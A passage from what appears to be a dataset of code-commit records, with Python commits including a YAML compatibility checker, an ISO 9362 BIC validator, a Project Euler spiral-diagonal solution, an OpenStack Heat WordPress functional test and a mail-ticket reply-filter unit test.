assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
<commit_before><commit_msg>Add script to validate files are yamelot compatible<commit_after>
|
import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
Add script to validate files are yamelot compatibleimport sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
<commit_before><commit_msg>Add script to validate files are yamelot compatible<commit_after>import sys
import pprint
import time
import yaml
import ygp
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
path = sys.argv[1]
ygp_time = 0
yaml_time = 0
for path in sys.argv[1:]:
print 'checking', path
src = open(path).read()
start = time.time()
yaml_version = yaml.load(src, Loader=SafeLoader)
yaml_time += time.time() - start
start = time.time()
ygp_version = ygp.loads(src)
ygp_time += time.time() - start
assert ygp_version == yaml_version
print 'YGP:', ygp_time
print 'YAML:', yaml_time
|
|
75bcef02660da492bcbaa1bad4a15a55f64a6df9
|
stdnum/iso9362.py
|
stdnum/iso9362.py
|
# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ...
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ...
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
Add ISO 9362 (BIC) support
|
Add ISO 9362 (BIC) support
|
Python
|
lgpl-2.1
|
arthurdejong/python-stdnum,holvi/python-stdnum,holvi/python-stdnum,arthurdejong/python-stdnum,holvi/python-stdnum,arthurdejong/python-stdnum,dchoruzy/python-stdnum,t0mk/python-stdnum
|
Add ISO 9362 (BIC) support
|
# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
<commit_before><commit_msg>Add ISO 9362 (BIC) support<commit_after>
|
# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
Add ISO 9362 (BIC) support# iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
<commit_before><commit_msg>Add ISO 9362 (BIC) support<commit_after># iso9362.py - functions for handling ISO 9362 Business identifier codes
#
# Copyright (C) 2015 Lifealike Ltd
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""ISO 9362 (Business identifier codes).
An ISO 9362 identifier (also: BIC, BEI, or SWIFT code) uniquely
identifies an institution. They are commonly used to route financial
transactions.
The code consists of a 4 letter institution code, a 2 letter country code,
and a 2 character location code, optionally followed by a three character
branch code.
>>> validate('AGRIFRPP882')
'AGRIFRPP882'
>>> validate('AGRIFRPP')
'AGRIFRPP'
>>> validate('AGRIFRPP8')
Traceback (most recent call last):
...
InvalidLength: ..
>>> validate('AGRIF2PP') # country code can't contain digits
Traceback (most recent call last):
...
InvalidFormat: ..
>>> format('agriFRPP') # conventionally caps
'AGRIFRPP'
"""
import re
from stdnum.exceptions import *
from stdnum.util import clean
_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any surrounding whitespace."""
number = clean(number).strip()
return number
def validate(number):
"""Checks to see if the number provided is a valid routing number. This
checks the length and characters in each position."""
number = compact(number)
if len(number) not in (8, 11):
raise InvalidLength()
match = _bic_re.search(number)
if not match:
raise InvalidFormat()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid BIC. This checks the
length and characters in each position."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return number.upper()
|
|
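As an illustration of the 4+2+2+3 field layout described in the module docstring above, a small standalone helper can split a BIC into its parts. This is a hedged sketch: the function name, return shape, and ValueError are mine, not part of python-stdnum.

import re

_bic_re = re.compile(r'^[a-z]{6}[0-9a-z]{2}([0-9a-z]{3})?$', re.IGNORECASE)

def split_bic(number):
    """Split a compacted BIC into institution, country, location, branch."""
    number = number.strip().upper()
    if not _bic_re.match(number):
        raise ValueError('not a valid BIC')
    return {
        'institution': number[:4],     # 4 letter institution code
        'country': number[4:6],        # 2 letter country code
        'location': number[6:8],       # 2 character location code
        'branch': number[8:] or None,  # optional 3 character branch code
    }

print(split_bic('AGRIFRPP882'))
# {'institution': 'AGRI', 'country': 'FR', 'location': 'PP', 'branch': '882'}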
a74f20b573f98fb213ded92f4447140ac1f00e31
|
euler028.py
|
euler028.py
|
#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
Add solution for problem 28
|
Add solution for problem 28
|
Python
|
mit
|
cifvts/PyEuler
|
Add solution for problem 28
|
#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
<commit_before><commit_msg>Add solution for problem 28<commit_after>
|
#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
Add solution for problem 28#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
<commit_before><commit_msg>Add solution for problem 28<commit_after>#!/usr/bin/python
count = 1
target = 3
step = 2
LIMIT = 1001
while step < LIMIT:
for i in range(4):
count += target
target += step
target += 2
step += 2
print(count)
|
|
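The loop above walks the four corners of each odd-sided ring of the spiral; for side length n those corners sum to 4*n*n - 6*(n - 1), which gives an independent cross-check. The closed-form function below is a verification sketch added here, not part of the submitted solution.

def spiral_diagonal_sum(limit):
    # 1 for the centre, then the corner sum of each ring of odd side n
    total = 1
    for n in range(3, limit + 1, 2):
        total += 4 * n * n - 6 * (n - 1)
    return total

def spiral_diagonal_sum_loop(limit):
    # The same walk as the submitted solution, wrapped in a function
    count, target, step = 1, 3, 2
    while step < limit:
        for _ in range(4):
            count += target
            target += step
        target += 2
        step += 2
    return count

assert spiral_diagonal_sum(1001) == spiral_diagonal_sum_loop(1001)
print(spiral_diagonal_sum(1001))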
d656978e96489d7ce6cd0d91f90807ff2dc1f1ef
|
heat/tests/functional/test_WordPress_Single_Instance_With_EIP.py
|
heat/tests/functional/test_WordPress_Single_Instance_With_EIP.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
    stdin, stdout, stderr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
Add new functional test for WordPress_Single_Instance_With_EIP
|
Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com>
|
Python
|
apache-2.0
|
cwolferh/heat-scratch,rh-s/heat,redhat-openstack/heat,steveb/heat,Triv90/Heat,citrix-openstack-build/heat,steveb/heat,miguelgrinberg/heat,takeshineshiro/heat,rh-s/heat,Triv90/Heat,pshchelo/heat,JioCloud/heat,pshchelo/heat,dims/heat,pratikmallya/heat,cryptickp/heat,cwolferh/heat-scratch,dims/heat,takeshineshiro/heat,dragorosson/heat,dragorosson/heat,pratikmallya/heat,miguelgrinberg/heat,gonzolino/heat,citrix-openstack-build/heat,gonzolino/heat,maestro-hybrid-cloud/heat,rickerc/heat_audit,srznew/heat,Triv90/Heat,jasondunsmore/heat,srznew/heat,openstack/heat,rickerc/heat_audit,NeCTAR-RC/heat,jasondunsmore/heat,cryptickp/heat,rdo-management/heat,maestro-hybrid-cloud/heat,NeCTAR-RC/heat,ntt-sic/heat,noironetworks/heat,varunarya10/heat,openstack/heat,rdo-management/heat,JioCloud/heat,noironetworks/heat,redhat-openstack/heat,varunarya10/heat,ntt-sic/heat
|
Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com>
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
    stdin, stdout, stderr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
<commit_before><commit_msg>Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com><commit_after>
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
    stdin, stdout, stderr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com># vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
    stdin, stdout, stderr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
<commit_before><commit_msg>Add new functional test for WordPress_Single_Instance_With_EIP
Change-Id: I483c5c32b9c29dc966bd154d760108292fcdbf5f
Signed-off-by: Jeff Peeler <d776211e63e47e40d00501ffdb86a800e0782fea@redhat.com><commit_after># vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import nose
from nose.plugins.attrib import attr
from heat.common import context
from heat.engine import manager
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'eip'])
def test_template():
template = 'WordPress_Single_Instance_With_EIP.template'
func_utils = util.FuncUtils()
func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
func_utils.create_stack(template, 'F17')
func_utils.check_cfntools()
func_utils.wait_for_provisioning()
#func_utils.check_user_data(template)
ssh = func_utils.get_ssh_client()
# 1. ensure wordpress was installed
wp_file = '/etc/wordpress/wp-config.php'
    stdin, stdout, stderr = ssh.exec_command('ls ' + wp_file)
result = stdout.readlines().pop().rstrip()
assert result == wp_file
print "Wordpress installation detected"
# 2. check floating ip assignment
nclient = func_utils.get_nova_client()
if len(nclient.floating_ips.list()) == 0:
print 'zero floating IPs detected'
assert False
else:
found = 0
mylist = nclient.floating_ips.list()
for item in mylist:
if item.instance_id == func_utils.phys_rec_id:
print 'floating IP found', item.ip
found = 1
break
assert found == 1
func_utils.cleanup()
|
|
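The floating IP check in the test above can be stated more compactly with any(); here is a sketch of that refactor, keeping the attribute names the test already uses (a nova client and the instance_id field on floating IP records). It is an illustration, not a change to the committed test.

def assert_floating_ip_assigned(nclient, instance_id):
    # Fail fast when the tenant has no floating IPs at all
    ips = nclient.floating_ips.list()
    assert ips, 'zero floating IPs detected'
    # Then require at least one IP bound to the stack's instance
    assert any(ip.instance_id == instance_id for ip in ips), \
        'no floating IP bound to instance %s' % instance_id

Inside the test this would replace the found flag and the manual loop with a single call: assert_floating_ip_assigned(nclient, func_utils.phys_rec_id).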
f3da7964fbdef7241d25dde2fd1489a64f710c36
|
test/test_reply.py
|
test/test_reply.py
|
import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
Test to verify the new functionality
|
Test to verify the new functionality
|
Python
|
agpl-3.0
|
UPC/mailtoticket,alexm/mailtoticket,UPC/mailtoticket,alexm/mailtoticket,aaguilera/mailtoticket,aaguilera/mailtoticket,jaumemoral/mailtoticket,jaumemoral/mailtoticket
|
Test to verify the new functionality
|
import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Test to verify the new functionality<commit_after>
|
import unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
"solicitant": "usuari.real",
"emailSolicitant": "mail.extern@mail.com"
}
self.identitat = mock.create_autospec(GestioIdentitat)
self.identitat.obtenir_uid.return_value = None
settings.init()
settings.set("regex_reply", "(.*)") # Una que trobi sempre algo
settings.set("regex_privat", "X") # Una que no trobi mai res
settings.set("usuari_extern", "usuari.extern")
def test_reply_mail_extern_igual_a_solicitant_detecta_usuari_real(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.real')
def test_reply_mail_extern_diferent_a_solicitant_detecta_usuari_extern(
self):
msg = mock.create_autospec(MailTicket)
msg.get_from.return_value = "mail.extern.diferent@mail.com"
msg.get_subject.return_value = "Re: ticket de prova"
f = FiltreReply(msg, self.tickets, self.identitat)
self.assertTrue(f.es_aplicable())
self.assertEquals(f.solicitant, 'usuari.extern')
if __name__ == '__main__':
unittest.main()
|
Test to verify the new functionalityimport unittest
import mock
import settings
from soa.tiquets import GestioTiquets
from soa.identitat import GestioIdentitat
from filtres.reply import FiltreReply
from mailticket import MailTicket
class TestReply(unittest.TestCase):
def setUp(self):
self.tickets = mock.create_autospec(GestioTiquets)
self.tickets.consulta_tiquet_dades.return_value = {
